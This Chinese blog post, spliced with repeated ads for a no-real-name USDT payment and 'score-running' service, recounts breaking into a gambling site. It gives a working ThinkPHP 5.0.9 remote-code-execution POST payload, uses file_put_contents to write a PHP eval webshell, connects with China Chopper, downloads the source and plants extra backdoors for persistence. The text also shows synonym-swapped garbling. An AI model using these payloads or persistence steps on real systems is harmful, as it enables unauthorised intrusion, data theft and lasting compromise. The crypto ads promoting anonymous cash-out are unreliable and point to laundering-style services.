欢迎进入UG环球官网(环球UG)!

usdt无需实名买入卖出(www.caibao.it):简朴的BC站点getshell

admin2个月前64

USDT官网

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

最近来了点义务,做BC站,以前没做过只能碰碰运气!

确定目的
主站:

通过旁站:

信息网络
通过信息网络发现是个tp v5.0.9,此版本存在tp-rce破绽。

直接通过payload举行测试,

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

查找payload,直接打:

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

发现是php 5.4.45版本的,

,

usdt支付接口

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

,

直接实验getshell:

发现system被禁用,实验其他系统下令的也一样。

查看phpinfo中desable_functions禁用了那些函数。

想办法怎么绕过举行写马(此处卡了我半天)
最后通过一位渗透小伙伴,想出下面的可以行使file_put_contents直接写shell,想了半天,忘了用其他函数举行直接写马就可以了,并不需要非得行使system下令举行写马,照样底层知识微弱啊。再次谢谢小伙伴!

getshell
组织payload:

_method=__construct&filter[]=assert&method=get&get[]=file_put_contents('a.php','<?php eval($_POST[a])?>')

写入乐成,行使菜刀毗邻。

乐成毗邻。
查看权限:

发现启动了远程平安模式。
想要绕过,发现许多函数被禁用,占未乐成。
下载源码:

多部署一些后门,防止被删。

上一篇 下一篇

猜你喜欢

网友评论

随机文章
热门文章
热评文章
热门标签